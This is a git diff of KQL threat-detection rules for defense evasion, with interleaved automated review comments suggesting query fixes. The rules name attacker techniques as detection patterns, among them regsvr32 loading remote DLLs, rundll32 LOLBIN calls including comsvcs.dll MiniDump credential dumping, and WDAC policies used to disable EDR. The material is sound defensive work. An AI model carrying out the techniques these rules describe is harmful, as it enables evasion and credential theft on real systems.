@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Execution From Tmp Folder
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-06-02
-// Level: medium
-// Description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Execution From Tmp Folder
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where FolderPath startswith "/tmp/" and (not(FolderPath endswith "/usr/bin/nextcloud"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql
index 39f05471..8212cce7 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-25
-// Level: medium
-// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.009
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-25
+// Level: medium
+// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql
index 476dd3f0..1e15f8da 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-13
-// Level: medium
-// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.009
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-13
+// Level: medium
+// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".txt") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql b/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql
index 9877b57d..d7aa77df 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious GoogleUpdate Child Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-15
-// Level: high
-// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Potentially Suspicious GoogleUpdate Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" and (not((isnull(FolderPath) or (FolderPath contains "\\Google" or (FolderPath endswith "\\setup.exe" or FolderPath endswith "chrome_updater.exe" or FolderPath endswith "chrome_installer.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql b/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql
index 2a629634..d224b552 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Office Document Executed From Trusted Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-21
-// Level: high
-// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Office Document Executed From Trusted Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: high
+// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where (((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\dopus.exe") and (ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Templates" or ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Word\\Startup\\" or ProcessCommandLine contains "\\Microsoft Office\\root\\Templates\\" or ProcessCommandLine contains "\\Microsoft Office\\Templates\\")) and (not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql
index 198214a4..4d5eb074 100644
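Review bot: The template exclusion `not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx"))` only takes effect when the document path is the final token of the command line; when Explorer starts Office through the registered open verb the path is normally quoted and can be followed by further switches, so a legitimate template launch typically ends with `"` or a switch and the exclusion never fires, leaving this high-level rule to alert on ordinary template use. A tolerant form that still anchors on the extension is `not(ProcessCommandLine matches regex @'(?i)\.(dotx|xltx|potx)"?(\s|$)')`. The trusted-location list is also limited to the four `Templates`/`Word\Startup` paths visible in the query; if organisation-specific trusted locations set via policy are deliberately out of scope, a False Positives line saying so would help whoever tunes this.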
--- a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Ping/Copy Command Combination -// Author: X__Junior (Nextron Systems) -// Date: 2023-07-18 -// Level: medium -// Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 - -DeviceProcessEvents +// Title: Potentially Suspicious Ping/Copy Command Combination +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-18 +// Level: medium +// Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents | where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "copy ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql index 0ccc5bc1..5258a128 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql 
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023-05-24
-// Level: medium
-// Description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.010
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-24
+// Level: medium
+// Description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /i" or ProcessCommandLine contains " -i") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains "ftp" or ProcessCommandLine contains "http")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql
index dcfeef7f..a75a5257 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql
@@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Regsvr32 HTTP IP Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-11 -// Level: high -// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010 -// False Positives: -// - FQDNs that start with a number such as "7-Zip" - -DeviceProcessEvents +// Title: Potentially Suspicious Regsvr32 HTTP IP Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-11 +// Level: high +// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - FQDNs that start with a number such as "7-Zip" + +DeviceProcessEvents | where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains " /i:http://1" or ProcessCommandLine contains " /i:http://2" or ProcessCommandLine contains " /i:http://3" or ProcessCommandLine contains " /i:http://4" or ProcessCommandLine contains " /i:http://5" or ProcessCommandLine contains " /i:http://6" or ProcessCommandLine contains " /i:http://7" or ProcessCommandLine contains " /i:http://8" or ProcessCommandLine contains " /i:http://9" or ProcessCommandLine contains " /i:https://1" or ProcessCommandLine contains " /i:https://2" or ProcessCommandLine contains " /i:https://3" or ProcessCommandLine contains " /i:https://4" or ProcessCommandLine contains " /i:https://5" or ProcessCommandLine contains " /i:https://6" or ProcessCommandLine contains " /i:https://7" or ProcessCommandLine contains " /i:https://8" or ProcessCommandLine contains " /i:https://9" or ProcessCommandLine contains " -i:http://1" or ProcessCommandLine contains " -i:http://2" or ProcessCommandLine contains " -i:http://3" or 
ProcessCommandLine contains " -i:http://4" or ProcessCommandLine contains " -i:http://5" or ProcessCommandLine contains " -i:http://6" or ProcessCommandLine contains " -i:http://7" or ProcessCommandLine contains " -i:http://8" or ProcessCommandLine contains " -i:http://9" or ProcessCommandLine contains " -i:https://1" or ProcessCommandLine contains " -i:https://2" or ProcessCommandLine contains " -i:https://3" or ProcessCommandLine contains " -i:https://4" or ProcessCommandLine contains " -i:https://5" or ProcessCommandLine contains " -i:https://6" or ProcessCommandLine contains " -i:https://7" or ProcessCommandLine contains " -i:https://8" or ProcessCommandLine contains " -i:https://9") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql index ae6e77df..204a73e8 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql 
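Review bot: The thirty-six `ProcessCommandLine contains " /i:http://1"` … `ProcessCommandLine contains " -i:https://9"` clauses enumerate one pattern across scheme, switch prefix and leading digit, which is hard to read and easy to leave out of sync when a variant is added; the same condition is `ProcessCommandLine matches regex @'(?i)\s[/-]i:https?://[1-9]'`, with `(?i)` keeping the case-insensitivity that `contains` gives today. The enumeration also cannot cheaply cover the Unicode dash variants (`–i`, `—i`) that the neighbouring ping/copy rule already handles, or an IPv6 literal host (`http://[`), whereas the regex can be extended in place. The hunk only rewrites header lines, so this is a follow-up to the generated query rather than to the change itself.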
@@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Rundll32 Activity -// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-01-16 -// Level: medium -// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: Potentially Suspicious Rundll32 Activity +// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where ((ProcessCommandLine contains "javascript:" and ProcessCommandLine contains ".RegisterXLL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURLA") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "FileProtocolHandler") or (ProcessCommandLine contains "zipfldr.dll" and ProcessCommandLine contains "RouteTheCall") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "ShellExec_RunDLL") or (ProcessCommandLine contains "mshtml.dll" and ProcessCommandLine contains "PrintHTML") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "advpack.dll" and 
ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieframe.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "shdocvw.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "syssetup.dll" and ProcessCommandLine contains "SetupInfObjectInstallAction") or (ProcessCommandLine contains "setupapi.dll" and ProcessCommandLine contains "InstallHinfSection") or (ProcessCommandLine contains "pcwutl.dll" and ProcessCommandLine contains "LaunchApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbShortcut") or (ProcessCommandLine contains "scrobj.dll" and ProcessCommandLine contains "GenerateTypeLib" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "shimgvw.dll" and ProcessCommandLine contains "ImageView_Fullscreen" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "comsvcs.dll" and ProcessCommandLine contains "MiniDump")) and (not((((ProcessCommandLine contains "Shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".cpl") and InitiatingProcessCommandLine contains ".cpl" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe") or ProcessCommandLine contains "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver" or (ProcessCommandLine endswith ".cpl\"," and ProcessCommandLine startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe")))) \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
index 27e47681..7eff346b 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
@@ -1,13 +1,13 @@ -// Title: Potentially Suspicious Rundll32.EXE Execution of UDL File -// Author: @kostastsale -// Date: 2024-08-16 -// Level: medium -// Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. -// Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011, attack.t1071 -// False Positives: -// - UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios. - -DeviceProcessEvents +// Title: Potentially Suspicious Rundll32.EXE Execution of UDL File +// Author: @kostastsale +// Date: 2024-08-16 +// Level: medium +// Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. +// Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011, attack.t1071 +// False Positives: +// - UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios. + +DeviceProcessEvents | where ((ProcessCommandLine contains "oledb32.dll" and ProcessCommandLine contains ",OpenDSLFile " and (ProcessCommandLine contains "\\Users\\" and ProcessCommandLine contains "\\Downloads\\")) and ProcessCommandLine endswith ".udl") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql b/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql index 33c0cdf3..dd9a9245 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load -// Author: frack113 -// Date: 2023-02-17 -// Level: medium -// Description: Detects the image load of VSS DLL by uncommon executables -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.impact, attack.t1490 - -DeviceImageLoadEvents +// Title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load +// Author: frack113 +// Date: 2023-02-17 +// Level: medium +// Description: Detects the image load of VSS DLL by uncommon executables +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490 + +DeviceImageLoadEvents | where FolderPath endswith "\\vsstrace.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\{"))))) and (not((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp"))) \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql
index e0cea487..ed2f4df5 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql
@@ -1,12 +1,12 @@ -// Title: Potentially Suspicious WDAC Policy File Creation -// Author: X__Junior -// Date: 2025-02-07 -// Level: medium -// Description: Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Administrators and security vendors could leverage WDAC, apply additional filters as needed. - -DeviceFileEvents +// Title: Potentially Suspicious WDAC Policy File Creation +// Author: X__Junior +// Date: 2025-02-07 +// Level: medium +// Description: Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Administrators and security vendors could leverage WDAC, apply additional filters as needed. 
+ +DeviceFileEvents | where FolderPath contains "\\Windows\\System32\\CodeIntegrity\\" and (not((((InitiatingProcessCommandLine contains "ConvertFrom-CIPolicy -XmlFilePath" and InitiatingProcessCommandLine contains "-BinaryFilePath ") or InitiatingProcessCommandLine contains "CiTool --update-policy" or (InitiatingProcessCommandLine contains "Copy-Item -Path" and InitiatingProcessCommandLine contains "-Destination")) or (InitiatingProcessFolderPath endswith "\\Microsoft.ConfigurationManagement.exe" or InitiatingProcessFolderPath endswith "\\WDAC Wizard.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") or InitiatingProcessFolderPath =~ "System"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql b/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql index 6f2558fb..227154b9 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql 
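Review bot: The `DeviceFileEvents` query at the end of the hunk matches every action under `\Windows\System32\CodeIntegrity\`, including `FileModified` and `FileDeleted` on files that already live there, although the title and description are about policy file creation; add `and ActionType in ("FileCreated", "FileRenamed")` next to the path clause so in-place writes and deletions by processes outside the allow-list do not swamp the result set. The process exclusions are written as `InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe"` and similar full paths, which behaves as an exact match and silently misses the same binary on a non-`C:` system drive; dropping the drive letter (`endswith "\\Windows\\System32\\dllhost.exe"`) or using `=~` would make the intent explicit. Since every stock `powershell.exe`/`pwsh.exe` path is excluded outright, a policy dropped from an interactive PowerShell session is not alerted on either, which deserves a sentence in the False Positives header so analysts know the gap is intentional.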
@@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Windows App Activity -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-12 -// Level: medium -// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate packages that make use of external binaries such as Windows Terminal - -DeviceProcessEvents +// Title: Potentially Suspicious Windows App Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-12 +// Level: medium +// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate packages that make use of external binaries such as Windows Terminal + +DeviceProcessEvents | where InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\" and ((ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Base64") or (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe")) and (not(((FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.SysinternalsSuite") or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath contains ":\\Program 
Files\\WindowsApps\\Microsoft.WindowsTerminal" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql index 56626ac0..fccf216e 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql 
@@ -1,11 +1,11 @@
-// Title: Potentially Suspicious Wuauclt Network Connection
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-10-12
-// Level: medium
-// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.
-// One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceNetworkEvents
+// Title: Potentially Suspicious Wuauclt Network Connection
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-12
+// Level: medium
+// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.
+// One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceNetworkEvents
